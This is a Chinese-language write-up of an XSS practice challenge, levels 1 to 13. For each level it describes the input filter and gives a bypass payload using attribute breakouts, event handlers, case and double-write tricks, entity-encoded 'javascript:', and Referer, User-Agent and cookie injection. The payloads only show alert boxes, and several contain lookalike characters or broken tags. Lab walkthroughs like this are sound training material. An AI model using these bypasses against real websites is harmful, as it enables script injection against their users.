Xss挑战之旅writeup

Level_1
输入点在url中,反射型

payload: http://118.89.167.246:2503/xss-game/level1.php?name=<script>alert(/xss/)script>

Xss挑战之旅writeup_第1张图片

Level 2
搜索型,查看元素可以看到输入在input标签内,需要闭合input标签
Xss挑战之旅writeup_第2张图片

Payload: “><script>alert(‘xss’)script><

Xss挑战之旅writeup_第3张图片

Level 3
输入点在input标签的value属性里面,尝试闭合属性,基于事件弹窗 ,双引号失败,试试 单引号

Paload: ‘ οnmοuseοver=alert(‘xss’)

Xss挑战之旅writeup_第4张图片

Level 4
和上一题一样,输入点也是在value属性里面,这次用双引号闭合属性

Payload: “ οnmοuseοver=alert(‘xss’) “

Xss挑战之旅writeup_第5张图片

Level 5
过滤情况:
On替换为o_n
Script替换为sc_ript
大小写尝试了也不行,只能用别的办法了

Payload: “><a href=javascript:alert(‘xss’)>111a><

Xss挑战之旅writeup_第6张图片

Level 6.
过滤情况:
On替换为o_n
Script替换为sc_ript
Href替换为hr_ef
尝试了一下用大小写绕过

Payload: “><img Src=ss Onerror=alert(‘xss’)>
        “><Script>alert(‘xss’)SCript>
        “><a HRef=javascript:alert(‘xss’)>hha>

Xss挑战之旅writeup_第7张图片

Level 7
输入一个”>试试,发现script标签被删除了!
Xss挑战之旅writeup_第8张图片
Href和on也被删除了,尝试双写绕过
Payload:

“><scrscriptipt>alert(‘xss’)scriscriptpt>
“ oonnmouseover=alert ‘1’
“><a hrhrefef=javasscriptcript:alert(‘xss’)>hha>

Xss挑战之旅writeup_第9张图片

Level 8
基础知识:javascript:伪协议声明了URL的主体是任意的javascript代码,它由javascript的解释器运行

Javascript会被替换为javasc_rpt,考虑用Html实体编码绕过,r编码为r

Payload: javasc&#x72;ipt:alert(xss’)

Xss挑战之旅writeup_第10张图片

Level 9
Javascript会被替换为javasc_rpt,考虑用Html实体编码绕过,r编码为r
用上一关的payload试试,提示链接不合法,必须要有http://关键字

Payload: javascript:%0dhttp://www.0aa.me%0dalert(1) 或
javascript:alert(1)//http://www.0aa.me
%0a  %0d都为url编码的换行符

Xss挑战之旅writeup_第11张图片

Level 10
Keyword注入点,<、>都被过滤,几乎不能突破。右键源代码看到有个hidden的form表单,
这里写图片描述

Keyword参数后面输入:

&t_link=” type=”text” 1&t_history=” type=”text” 2&t_sort =” type=”text” 3

查看注入点,发现t_sort字段可以注入
Xss挑战之旅writeup_第12张图片

Payload: &t_sort=" type="text"οnmοuseοver=alert`1` "

Xss挑战之旅writeup_第13张图片

Level 11
和上题一样有个hidden的表单,不过此题的注入点在t_ref字段,值为http referer,抓包修改
这里写图片描述

referer头修改为:” type=”text” onmouseover=alert `1`

Xss挑战之旅writeup_第14张图片

Forward放行后弹窗
Xss挑战之旅writeup_第15张图片

Level 12
这一关的注入点在user-agent
这里写图片描述

和上题一样,抓包,改user-agent

Payload:” type=”text” οnmοuseοver=alert `1` “

Xss挑战之旅writeup_第16张图片

Xss挑战之旅writeup_第17张图片

Level 13
类似的,修改cookie参数

你可能感兴趣的:(信息安全,xss,WriteUp)